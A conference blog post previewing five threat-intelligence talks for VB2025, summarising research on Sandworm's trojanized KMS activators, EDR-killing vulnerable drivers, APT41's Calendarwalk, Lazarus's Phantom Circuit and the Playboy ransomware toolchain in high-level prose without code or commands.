Posted by on Jun 10, 2025
The cybersecurity field moves quickly, with new research surfacing regularly and threat actors constantly shifting their approaches. Some discoveries reveal long-running campaigns that have flown under the radar, while others expose novel techniques that challenge conventional thinking about how attacks unfold. We've gathered five recent research topics that caught our attention, each offering a different angle on the current threat landscape and the creative ways both attackers and defenders are adapting.
by Arda Büyükkaya (EclecticIQ)
This research presents original threat intelligence on a Russian military intelligence (GRU)-linked cyber espionage and disruption campaign very likely conducted by Sandworm (APT44), which has weaponized Ukraine's widespread use of pirated software. Since late 2023, Sandworm has distributed trojanized Microsoft KMS activators and fake Windows updates through Ukrainian-speaking torrent sites and forums, embedding malware directly into tools commonly used to bypass licensing restrictions. This social engineering strategy enabled precise targeting of economically vulnerable Ukrainian users – spanning civilians, businesses, and potentially government institutions – while evading conventional security controls.
The research details three malware families central to this campaign: BACKORDER, a GO-based loader that disables Windows Defender and deploys Dark Crystal RAT (DcRAT) for espionage and data theft, and Kalambur, a previously unreported backdoor disguised as a Microsoft update. Kalambur is notable for its redundant persistence mechanisms: it establishes a TOR-based reverse shell via curl.exe, enables RDP through hidden admin accounts, and installs an SSH server – all of which allow attackers to retain access even after detection of the Kalambur malware.
The analysis includes a deep technical dive into Kalambur, with attribution to Sandworm based on metadata overlaps in C2 infrastructure and forgotten Russian-language comments in source code.
It also provides actionable IOCs, YARA and Sigma rules, and detailed pivoting methods using VirusTotal and other public tools. The findings offer insight into both the initial and post-compromise tactics of GRU-linked actors, demonstrating how widespread software piracy within a nation can be weaponized as a scalable and low-cost initial access vector.
by Jiří Vinopal (Check Point Research)
What if your trusted security solutions could be silently disarmed without warning? What if a long-forgotten vulnerability in a legitimate driver became the perfect weapon for attackers to bypass defences and strike undetected?
In 2025, Check Point Research uncovered a sophisticated campaign leveraging over 2,500 unique variants of a vulnerable legacy driver to disable EDR and AV solutions. By abusing a loophole in Windows driver signing, the attackers successfully deployed a powerful EDR/AV killer module that bypassed Microsoft's Vulnerable Driver Blocklist and evaded detection mechanisms, including those introduced by the LOLDrivers project.
To ensure stealth, the attackers carefully manipulated the driver's PE structure, generating distinct hashes while preserving its valid signature – a move that allowed thousands of modified variants to remain undetected. Operating from a public cloud's China region, the attackers targeted victims primarily in China and parts of Asia, with devastating precision.
Check Point Research's findings prompted Microsoft to update its Vulnerable Driver Blocklist, neutralizing the exploited driver variants.
by Tim Chen & Still Hsu (TeamT5)
In recent years, China-nexus threat groups have increasingly adopted tactics to obscure their malware footprint, particularly through the use of LOTS (living off trusted sites) and LOLBins (living off the land binaries and scripts). Recent research by TeamT5 has uncovered a new malware variant named Calendarwalk. This malware employs tactics not previously observed within the APT landscape, including abuse of LOTS via Google Calendar events and exploitation of LOLBins through Windows Workflow Foundation. The report details these techniques and examines a potential link to APT41.
In December 2024, TeamT5 identified two fully undetected (FUD) samples exploiting XOML (Extensible Object Markup Language) in Windows Workflow Foundation (WF) to execute payloads. This is believed to be the first documented case of an APT using this method in the wild. Analysis of the samples revealed two shellcode payloads compressed and encoded using a consistent multi-stage chain. One payload was identified as an AES-encrypted variant of Chatloader (also known as DodgeBox or StealthVector), previously tied to APT41. The other was a previously undocumented malware variant, now named Calendarwalk.
Static analysis of Calendarwalk was initially ineffective due to extensive obfuscation. Through targeted assembly patching, its functionality was confirmed, including a novel command-and-control (C2) mechanism that retrieves and executes commands via Google Calendar events. Similarities were observed with Google Calendar RAT (GCR), an open-source proof-of-concept published on GitHub in 2023, suggesting that Calendarwalk's developer may have drawn inspiration from it.
Further analysis uncovered connections between Calendarwalk and Tabbywalk (also known as CurveBack or MoonWalk), another malware family attributed to APT41. While Calendarwalk utilizes Google Calendar for C2, Tabbywalk uses Google Drive in a comparable role. Both variants also include the same version of Chatloader, reinforcing the attribution link.
This research highlights the evolving tactics used by Chinese APT groups, particularly their increasing reliance on trusted infrastructure and native system components to maintain persistence, evade detection, and reduce forensic visibility.
by Ryan Sherstobitoff (SecurityScorecard)
In December 2024, a routine software update concealed a global cyber threat. The North Korean state-sponsored Lazarus Group infiltrated trusted development tools, launching a sophisticated supply chain attack code-named Phantom Circuit. The campaign compromised hundreds of victims across the cryptocurrency and technology sectors, using advanced obfuscation techniques and routing infrastructure through proxy servers located in Hasan, Russia.
Analysis by STRIKE revealed a notable shift in Lazarus Group tactics: embedding malware directly into widely used development applications. An extensive command-and-control (C2) infrastructure, operational since September 2024, was used to manage exfiltrated data. The group's administrative platform, concealed behind proxy relays, facilitated persistent access and data management via a hidden React-based interface with Node.js APIs. Further investigation revealed connections between Phantom Circuit and North Korean IT worker schemes, in which state-sponsored actors posing as freelance developers contributed malicious code to software projects.
The research provides a detailed breakdown of Phantom Circuit, including its layered infrastructure, anonymization techniques, and global impact. Key findings include:
The investigation relied on a combination of OSINT, netflow telemetry, and STRIKE threat intelligence feeds. North Korean IP addresses were observed originating traffic to Astrill VPN endpoints, which were then relayed through the Oculus Proxy network, registered to Sky Freight Limited in Hasan, Russia, before reaching Lazarus-controlled C2 infrastructure. These endpoints showed overlap with past cyber operations attributed to the Lazarus Group, further confirming attribution. Additional links were found between Phantom Circuit and North Korea's IT worker campaigns, where operatives injected malicious code into global development environments under the guise of freelance contributors.
The findings underscore the increasing complexity of state-sponsored cyber operations and the urgent need for robust supply chain security. Insights drawn from Phantom Circuit highlight the importance of monitoring development environments, verifying software dependencies, and applying advanced threat intelligence to defend against such attacks.
by Gijs Rijnders (Dutch National Police)
In recent years, ransomware has become one of the most prolific forms of cybercrime with financial gain as primary motive. The problem keeps getting bigger, with a new operation seeing the light almost every month. The Dutch National Police is often a key player in large-scale ransomware investigations. Operation Cronos is a prime example, where law enforcement took down infrastructure of the infamous LockBit group in 2024.
Today, many ransomware groups operate RaaS (ransomware-as-a-service) models. They provide the ransomware and a platform to extort victims as a service, and affiliated hacker groups carry out the actual attacks. The platform is often run from a VPS (virtual private server), and sometimes, this server is in the Netherlands. Dutch law enforcement seizes those servers and extracts their content for investigation. This happened to the Playboy ransomware in late 2024.
A chain of various tools is used to provide a ready-to-use ransomware package to affiliates of a RaaS program. Several modern ransomware operations even support CPU architectures and operating systems other than x86-64 and Windows. New cryptographic keys are generated for every victim, ransomware parameters are configured, and a builder creates the final package to be used by the affiliate. The investigation details how the Playboy ransomware servers were seized, examines the toolchain involved, and analyses how executables were prepared for deployment by affiliates.
All five of these topics will be presented live at VB2025 this September in Berlin, as part of a much broader programme featuring dozens of in-depth talks from across the threat intelligence community.
